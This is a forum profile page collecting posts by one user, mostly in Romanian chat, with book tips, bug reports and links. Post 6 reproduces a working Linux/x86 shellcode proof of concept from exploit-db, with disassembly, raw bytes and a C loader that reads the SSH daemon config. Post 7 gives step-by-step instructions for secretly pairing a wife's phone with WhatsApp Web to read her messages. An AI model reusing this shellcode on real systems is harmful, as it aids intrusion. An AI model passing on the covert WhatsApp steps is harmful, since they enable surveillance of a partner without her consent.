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Everything posted by Massaro

  1. Why is it important to bother with developing sophisticated ideas, in turn? It’s because there is no difference between doing so and thinking, for starters. It is important to think because action based on thinking is likely to be far less painful and more productive than action based upon ignorance. So, if you want to have a life characterized by competence, productivity, security, originality and engagement rather than one that is nasty, brutish and short, you need to think carefully about important issues. There is no better way to do so than to write. This is because writing extends your memory, facilitates editing and clarifies your thinking. Aici.
  2. The Power of Now, Eckhart Tolle The 48 Laws of Power, Robert Greene
  3. Massaro

    Fun stuff

    "It is human to make a mistake, unless you make one in a Captcha."
  4. Da-ti seama singur cum ai putea sa faci asa ceva.
  5. Format fizic. Daca aflu ceva nou ce ma intereseaza la culme si nu o gasesc nicaieri atunci mai arunc un ochi peste vreo 20 pagini de pe PC pe zi si tot asa pana o termin. Nu ma atrage cititul pe pc, laptop, kindle (carti) si ce mai sunt. Este top 10. Recomand si "You are not so smart" de David Mcraney
  6. /* # Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes # Author: Goutham Madhwaraj # Date: 2018-10-22 # Tested on: i686 GNU/Linux # Shellcode Length: 44 # ShoutOut - BarrierSec # gcc -fno-stack-protector -z execstack loader-bind.c -o Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor eax,eax 8048082: 50 push eax 8048083: 68 2f 63 61 74 push 0x7461632f 8048088: 68 2f 62 69 6e push 0x6e69622f 804808d: 89 e3 mov ebx,esp 804808f: 50 push eax 8048090: 68 6e 66 69 67 push 0x6769666e 8048095: 68 64 5f 63 6f push 0x6f635f64 804809a: 68 2f 73 73 68 push 0x6873732f 804809f: 68 2f 73 73 68 push 0x6873732f 80480a4: 68 2f 65 74 63 push 0x6374652f 80480a9: 89 e1 mov ecx,esp 80480ab: 6a 00 push 0x0 80480ad: 51 push ecx 80480ae: 53 push ebx 80480af: 89 e1 mov ecx,esp 80480b1: 50 push eax 80480b2: 89 e2 mov edx,esp 80480b4: b0 0b mov al,0xb 80480b6: cd 80 int 0x80 ===============POC by Goutham Madhwaraj========================= */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6e\x66\x69\x67\x68\x64\x5f\x63\x6f\x68\x2f\x73\x73\x68\x68\x2f\x73\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x6a\x00\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } https://www.exploit-db.com/exploits/45669/
  7. Ii iei telefonul cand e in dus. Intri pe web.whatsapp.com Scanezi codul QR cu telefonul (afli detaliile pe web.whatsapp.com) Acum ai acces la conversatiile ei cand are netul activat. Seara cand tu stai pe laptop si ea e in pat pe telefon, intri pe web whatsapp si iti faci nervi vazand ce vorbeste. Mai arunca un ochi pe forum ca s-a mai discutat despre asta de multe ori, al naibii sotiile astea, ma. Sa fie tot ele de vina?
  8. Ce urma daca ala nu avea manycam si chiar era una care si-o freca?
  9. Chromium Version 64.0.3282.167 (Official Build) La fel.
  10. Asa patesc si eu de fiecare data cand intru pentru cateva secunde de cand s-a bagat acest feed.
  11. Massaro


    https://devdocs.io/ Mi-am adus aminte recent de el, poate mai ajuta pe careva.
  12. array('userutul' => 'paroluta'); die('Apesi cancel ca bou.. Bagale daca esti jmeq :))'); :)))))))
  13. Apuca-te si fa tu asa ceva, nu mai astepta mura-n gura. Nu cred ca esti singurul care ar avea nevoie de asa ceva. Poti face si altundeva, nu neaparat in tara asta de cacat. Ti-am dat idee, acum pune-o in practica si imbogateste-te. Ar fi fain sa aiba toate catuse roz si sa ma lege de pat cand ma duc la ele, i-auzi.
  14. Te inseala, stai linistit. Nu e asa proasta pe cat crezi, daca vorbeste pe facebook cu Marin vecinu cu care incearca fetisuri noi zi de zi, te asigur ca ii merge mintea sa stearga discutiile dupa. @aismen are dreptate, nu mai are rost.
  15. Massaro


    Exact ce voiam. Thanks.
  16. https://itty.bitty.site Itty bitty sites are contained entirely within their own link. (Including this one!) This means they're... 💼Portable - you don't need a server to host them 👁Private - nothing is sent to–or stored on–this server 🎁Easy to share as a link or QR code Itty bitty sites can hold about as much as a printed page, and there is a lot you can do with that: ✒️Compose poetry 🛠Create an app 🐦Bypass a 140 280 char limit 🎨Express yourself in ascii
  17. This. Mai bine pui niste bani, deschizi cateva cutii de alea, poate ai norocul sa deschizi niste cutite si le vinzi alea. Poti sa-ti iei si cateva skin-uri de $10, $25 sau $50, le bagi la blackjack sau ce saracii mai sunt speciale pentru CS:GO si aia e.
  18. The detection of faked identities is a major problem in security. Current memory-detection techniques cannot be used as they require prior knowledge of the respondent’s true identity. Here, we report a novel technique for detecting faked identities based on the use of unexpected questions that may be used to check the respondent identity without any prior autobiographical information. While truth-tellers respond automatically to unexpected questions, liars have to “build” and verify their responses. This lack of automaticity is reflected in the mouse movements used to record the responses as well as in the number of errors. Responses to unexpected questions are compared to responses to expected and control questions (i.e., questions to which a liar also must respond truthfully). Parameters that encode mouse movement were analyzed using machine learning classifiers and the results indicate that the mouse trajectories and errors on unexpected questions efficiently distinguish liars from truth-tellers. Furthermore, we showed that liars may be identified also when they are responding truthfully. Unexpected questions combined with the analysis of mouse movement may efficiently spot participants with faked identities without the need for any prior information on the examinee. O mica parte. Restul cititi aici.
  19. Are cineva un link (.pdf) catre Practical Python and OpenCV de Adrian Rosebrock?
  20. Massaro
  21. Recomand Dark. Printre cele mai bune seriale de anul trecut. Drama si cinematografie de nota 10, lasand la o parte povestea in sine.
  22. Ori o parere din partea cuiva, ori...? Continuarea? Solutia este?
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